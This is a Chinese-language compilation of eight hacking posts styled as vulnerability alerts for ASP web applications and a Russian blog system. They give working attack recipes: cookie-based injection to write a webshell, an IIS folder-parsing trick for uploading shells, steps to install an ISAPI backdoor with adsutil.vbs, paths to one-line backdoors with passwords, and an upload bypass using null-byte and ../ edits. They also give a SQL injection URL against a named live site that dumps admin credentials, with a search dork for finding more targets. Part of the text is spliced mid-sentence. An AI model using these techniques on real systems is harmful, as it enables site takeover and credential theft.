天下马ASP收信程序漏洞漏洞预警(集锦8篇)

天下马ASP收信程序漏洞漏洞预警

       最近看了八进制论坛上针对伯乐ASP收信程序的漏洞分析,通过提交数据达到获取webshell的方法!正好有朋友让我帮忙看一看天下马的提交问题!主要是由于有些程序使用者自定义了一些函数,使得原来的方法不能够绕过函数,但是昨天看了看,还是可以通过其他方法实现的!

       首先,天下马的其他bug我们这里就不看了,直接看提交过程!

       网上公布的提交过程是类似这种的连接:

       .xxx.com/post.asp?act=&d00=202&d01=

       src=.a.com>&d02=&d10=&d11=17000813&d20=&d21=&d22=&d23=&d30=天下马

       &d31=&d32=1&d33=&d40=0&d41=0&d42=0&d50=&d51=&d98=&d99=123

       返回如图1所示表示正常插入

       我们来看看察看数据的页面及其部分源代码,如图2所示

       但是有些程序却使用了一些自定义函数,针对提交的数据进行验证和过滤

       我这里有一份代码如下:

       [Copy to clipboard] [ - ]CODE:

       相信很多朋友都已经看出来了,正如分析网站系统一样,这个自定义的代码只是针对Request.QueryString和Request.Form进行了过滤,没有对cookie提交的方式进行过滤!那么我们再看看天下马的获取方式

       strAreaName = request(“d00”) //还有很多,只写出一个

       ....

       ....

       if strAreaName “” then RS(“AreaName”) = strAreaName //还有很多,只写出一个

       ....

       ....

       这个是没有经过过滤的天下马的代码,增加自定义函数的页面是将request变量经过了Function CheckStr(ChkStr)的过滤,但是还有一种提交方式就是cookie提交!下面我们看看提交方法!

       首先是针对正常提交时候进行抓包分析,然后进行数据包的构造,我这里构造的包如下(这里我将真实信息修改了,^_^):

       [Copy to clipboard] [ - ]CODE:

       GET /post.asp?

       act=&d00=202&d02=&d11=17000813&d20=&d21=&d22=&d23=&d30=cookie&d31=&d32=1&d33=&d40=0&d41=0&d4

       2=0&d50=&d51=&d98=&d99=123 HTTP/1.

       Accept: */*

       Accept-Language: zh-cn

       UA-CPU: x86

       Accept-Encoding: gzip, deflate

       User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)

       Host: xxx.com

       Connection: Keep-Alive

       Cookie: ASPSESSIONIDCATSSDRC=NAAGENEADMNBDLJJFMKLGMDO;d01=;d10=

       这里的数据我们只需要把通过cookie提交的数据放入cookie项中就可以了,其他可以保持不变!

       然后使用NC提交!

       我们来看看察看数据的页面及其部分源代码,如图3所示

       成功写入!

       至于利用方法我想就不需要再多写了,朋友们自己去挖掘吧!

篇2:FTBBS ASP 7.0 上传漏洞漏洞预警

       < %

       userid=getcookie(“clubuser_id”)

       ............

       if Application(“FTBBSMB”)(7,0)=“M” then

       inFolder=year(date)&month(date())

       else

       inFolder=year(date())&month(date())&day(date())

       end if

       call makefolder(inFolder,fso)

       myFolder = inFolder&“/”&userid

       call makefolder(myFolder,fso)

       ...................

       formPath=inFolder&“/”&userid

       ......上传过程省略.....

       建立的文件夹读取的COOKIE里的userid

       修改COOKLIE里userid的值为fuck.asp形式即可建立IIS 6.0缺陷文件夹导致可以上传JPG的小马

       至于修改COOKIE各位大大应该都会吧~FTBBS貌似所有版本都有此问题吧~

篇3:如何放asp后门漏洞预警

       asp后门放置方法之一asp Injection,先看图一:

       这是我架在本机的一个动网文章管理的登陆页面,和平常没什么两样,原有的功能都存在。 再看幅我就不讲了,你可以上绿盟查查tombkeeper pgn写的IIS配置文件后门这篇文章。网友czy也写了一个同样的dll程序,用法就是在ie中执行ip/*.你设写的后缀?shell=你要的命令。看一下我用它在肉鸡上做的后门吧,我是用它来解析.ph4的后缀。图7:

       看到这里,你可能要说了,这个iis后门在3389终端里安装很方便,在命令行下呢?我们也有办法。iis默认安装下,会在/inetpub/adminscripts目录下生成19个vbs脚本,我们用其中的一个adsutil.vbs就可以帮我们装上这个奇妙的iis后门了。

       运用方法如下,我们分8步走,看看命令行下的快乐吧:

       1 copy idq.dll %systemroot%/system32/iisapi.dll

       将idq.dll copy到系统盘的system32目录下,重命名为iisapid.ll

       2得到虑拟站点的情况

       cscript adsutil.vbs enum /p /w3svc

       [/w3svc/Info]

       [/w3svc/Filters]

       [/w3svc/2]----------->这些就是拟虚拟站点了

       [/w3svc/3]

       [/w3svc/4]

       [/w3svc/1]

       3 得到IIS所有的有特权的DLL

       adsutil.vbs set /

篇4: 游戏网站程序0DAY漏洞预警

       :amxking

       挖掘:百事可乐

       准确点应该算是backdoor

       inurl:Find.asp 您的位置 >>客服中心 >>找回密码

       直接传马:

       .XXX.com/user/situjiaduotu2.asp

       一句话backdoor ,密码 : value

       .XXX.com/htmledit/Include/upfile_class.asp

       .XXX.com/htmledit\Include\DeCode.asp

       读库提权:

       D:\web\.xxx.com\Inc\Config.asp

篇5:FoosunCms的asp版本getshell漏洞预警

       在文件\User\award\awardAction.asp中:

       

       2

       3

       4

       5

       6

       7

       8

       9

       Integral=NoSqlHack(request.QueryString(“Integral”))

       ifaction=“join”then

       User_Conn.execute(“Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values(”&CintStr(prizeID)&“,'”&session(“FS_UserNumber”)&“',”&CintStr(awardID)&“)”)

       '获得当前参加人数--------------------------------

       User_Conn.execute(“Update FS_ME_Users set Integral=(Integral-”&Integral&“) where usernumber='”&session(“FS_UserNumber”)&“'”)

       请直接无视NoSqlHack,由于sql注入是发生在update语句中,所以我们可以修改表S_ME_Users的任意记录的任意字段信息

       webshell还可以用来代替access

       我们文件管理中上传个图片文件:

       192.168.1.101/UserFiles/27015564I69/_09_27_01_10_0390446.jpg

       UserNumber就是等于27015564I69

       通过以上的sql注入漏洞,直接update为test.asp

       192.168.1.101/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=1),UserNumber=0x74006500730074002E00610073007000,sex=(

       退出再重新登录

       生成test.asp目录,后续上传的文件都会保存在该文件中

       利用iis解析漏洞获取webshell

       ​

篇6:Fckeditor2.6.8 ASP版文件上传绕过漏洞预警

       exploit-db近期发布了一个FCkeditor2.6.8ASP版的一个上传绕过,不过不是很详细,只发了一个视频,是 的,可能有兄弟们看不到,转发到国内给大家看看,国内也有大牛分析过,我也一并发出来,

       代码分析:

       '漏洞文件:editor/filemanager/connectors/asp/commands.asp

       '漏洞函数:

       Sub FileUpload( resourceType, currentFolder, sCommand )

       Dim oUploader

       Set Uploader = New NetRube_Upload

       oUploader.MaxSize   = 0

       oUploader.Allowed   = ConfigAllowedExtensions.Item( resourceType )

       oUploader.Denied   = ConfigDeniedExtensions.Item( resourceType )

       oUploader.HtmlExtensions = ConfigHtmlExtensions

       oUploader.GetData

       Dim sErrorNumber

       sErrorNumber = “0”

       Dim sFileName, sOriginalFileName, sExtension

       sFileName = “”

       If oUploader.ErrNum >0 Then

       sErrorNumber = “202”

       Else

       ' Map the virtual path to the local server path.

       Dim sServerDir

       sServerDir = ServerMapFolder( resourceType, currentFolder, sCommand ) '获取保存文件路径

       Dim oFSO

       Set FSO = Server.CreateObject( “Scripting.FileSystemObject” )

       if not (oFSO.FolderExists( sServerDir ) ) then '判断文件夹是否存在

       sErrorNumber = “102”

       else

       ' Get the uploaded file name.

       sFileName   = oUploader.File( “NewFile” ).Name '获取上传文件名(包含后缀)

       sExtension   = oUploader.File( “NewFile” ).Ext '获取上传文件后缀(获取方式是文件名倒数7:的游戏箱子收信程序上传漏洞利用方法

       来自:影子鹰

       文章写得简洁一点,但是大家应该能看得懂!

       存在这个漏洞的箱子程序还是挺多的!皇马,吉祥什么的好像都有!

       首先看一下存在漏洞的具体文件代码,文件名称是GetGif.asp

       CODE:

       <%

       Response.Buffer = True

       Server.ScriptTimeOut=180

       'On Error Resume Next

       'dim SavePath

       ExtName = ”jpg,gif,png“ '允许扩展名

       SavePath =imgFolder '保存路径

       If Right(SavePath,1)”/“ Then SavePath=SavePath&”/“ '在目录后加(/)

       CheckAndCreateFolder(SavePath)

       UpLoadAll_a = Request.TotalBytes '取得客户端全部内容

       If(UpLoadAll_a<=0) Then

       Response.Write ”Sorry“

       Response.End

       end if

       Set UploadStream_c = Server.CreateObject(”ADODB.Stream“)

       UploadStream_c.Type =

       UploadStream_c.Open

       UploadStream_c.Write Request.BinaryRead(UpLoadAll_a)

       UploadStream_c.Position = 0

       FormDataAll_d = UploadStream_c.Read

       CrLf_e = chrB(13)&chrB(10)

       FormStart_f = InStrB(FormDataAll_d,CrLf_e)

       FormEnd_g = InStrB(FormStart_f 1,FormDataAll_d,CrLf_e)

       Set FormStream_h = Server.Createobject(”ADODB.Stream“)

       FormStream_h.Type =

       FormStream_h.Open

       UploadStream_c.Position = FormStart_f

       UploadStream_c.CopyTo FormStream_h,FormEnd_g-FormStart_f-3

       FormStream_h.Position = 0

       FormStream_h.Type = 2

       FormStream_h.CharSet = ”GB2312“

       FormStreamText_i = FormStream_h.Readtext

       FormStream_h.Close

       FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,”\“) 1,FormEnd_g)

       'FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,”=“) 2,FormEnd_g)

       'Response.Write FileName_j

       If(CheckFileExt(FileName_j,ExtName)) Then

       SaveFile = Server.MapPath(SavePath & FileName_j)

       'SaveFile=SavePath & FileName_j

       If Err Then

       Response.Write ”Sorry“

       Err.Clear

       Response.End

       Else

       SaveFile = CheckFileExists(SaveFile)

       k=Instrb(FormDataAll_d,CrLf_e&CrLf_e) 4

       l=Instrb(k 1,FormDataAll_d,leftB(FormDataAll_d,FormStart_f-1))-k-2

       FormStream_h.Type=

       FormStream_h.Open

       UploadStream_c.Position=k-

       UploadStream_c.CopyTo FormStream_h,l

       FormStream_h.SaveToFile SaveFile,2

       SaveFileName = Mid(SaveFile,InstrRev(SaveFile,”\“) 1)

       Response.write ”OK“

       Response.End

       End If

       Else

       Response.Write ”Sorry“

       Response.End

       End If

       %>

       <%

       '判断文件类型是否合格

       Function CheckFileExt(FileName,ExtName) '文件名,允许上传文件类型

       FileType = ExtName

       FileType = Split(FileType,”,“)

       For i = 0 To Ubound(FileType)

       If LCase(Right(FileName,3)) = LCase(FileType(i)) then

       CheckFileExt = True

       Exit Function

       Else

       CheckFileExt = False

       End if

       Next

       End Function

       '检查上传文件夹是否存在,不存在则创建文件夹

       Function CheckAndCreateFolder(FolderName)

       fldr = Server.Mappath(FolderName)

       Set fso = CreateObject(”Scripting.FileSystemObject“)

       If Not fso.FolderExists(fldr) Then

       fso.CreateFolder(fldr)

       End If

       Set fso = Nothing

       End Function

       '检查文件是否存在,重命名存在文件

       Function CheckFileExists(FileName)

       Set fso=Server.CreateObject(”Scripting.FileSystemObject“)

       If fso.FileExists(SaveFile) Then

       i=

       msg=True

       Do While msg

       CheckFileExists = Replace(SaveFile,Right(SaveFile,4),”_“ & i & Right(SaveFile,4))

       If not fso.FileExists(CheckFileExists) Then

       msg=False

       End If

       i=i

       Loop

       Else

       CheckFileExists = FileName

       End If

       Set fso=Nothing

       End Function

       %>

       也是很简洁的一个上传代码,也存在上传漏洞,使我们想起了DVBBS的上传漏洞,自己动手写一个HTML提交页面

       CODE:

       

       

       

       然后抓包,改包”20“-”00“,NC上传就可以了~这步骤不明白的朋友可以参考一下DVBBS的上传漏洞

       以上方法通杀IIS5和IIS6,还有一种方法就是针对IIS6的解析漏洞,可以上传一个1.asp;1.jpg文件也是可以的!

       此外还有一个就是针对路径的问题,因为默认的上传路径是/img/

       但是很多箱子的主人都把这个路径改掉了,如改成/img001/,更有甚者将目录设置的更为复杂

       针对这种情况的解决方法是在包中添加”../”,添加数目可以不是一个,如果箱子主人设置的很BT的话,可以通过提交多个"../”,

       在发生提交错误时,之前提交的文件就会被上传到网站的根目录了!具体情况还请大家具体分析一下!

篇8:国外一Blog程序0day漏洞预警

       :YJPS 转载请注明

       近来无聊 去国外网站上转悠,看到一个不错的Blog系统,可以注册用户,并分配一个二级目录,

       更无聊的就去检测了下,下面是分析结果。

       站点:.jj.ru/

       漏洞地址:.jj.ru/include/send_email.php?comment=1074

       得到用户和密码

       .jj.ru/include/send_email.php?comment=1074 and 1=2 union select 1,2,3,4,5,concat_ws(0x3a,id,username,password,email),7,8,9 from blogs_database.websiteadmin_admin_users limit 1,1--

       如想扩大战果,可GOOGLE里:inurl:send_email.php?comment=

       漏洞危害不小,请勿借此破坏,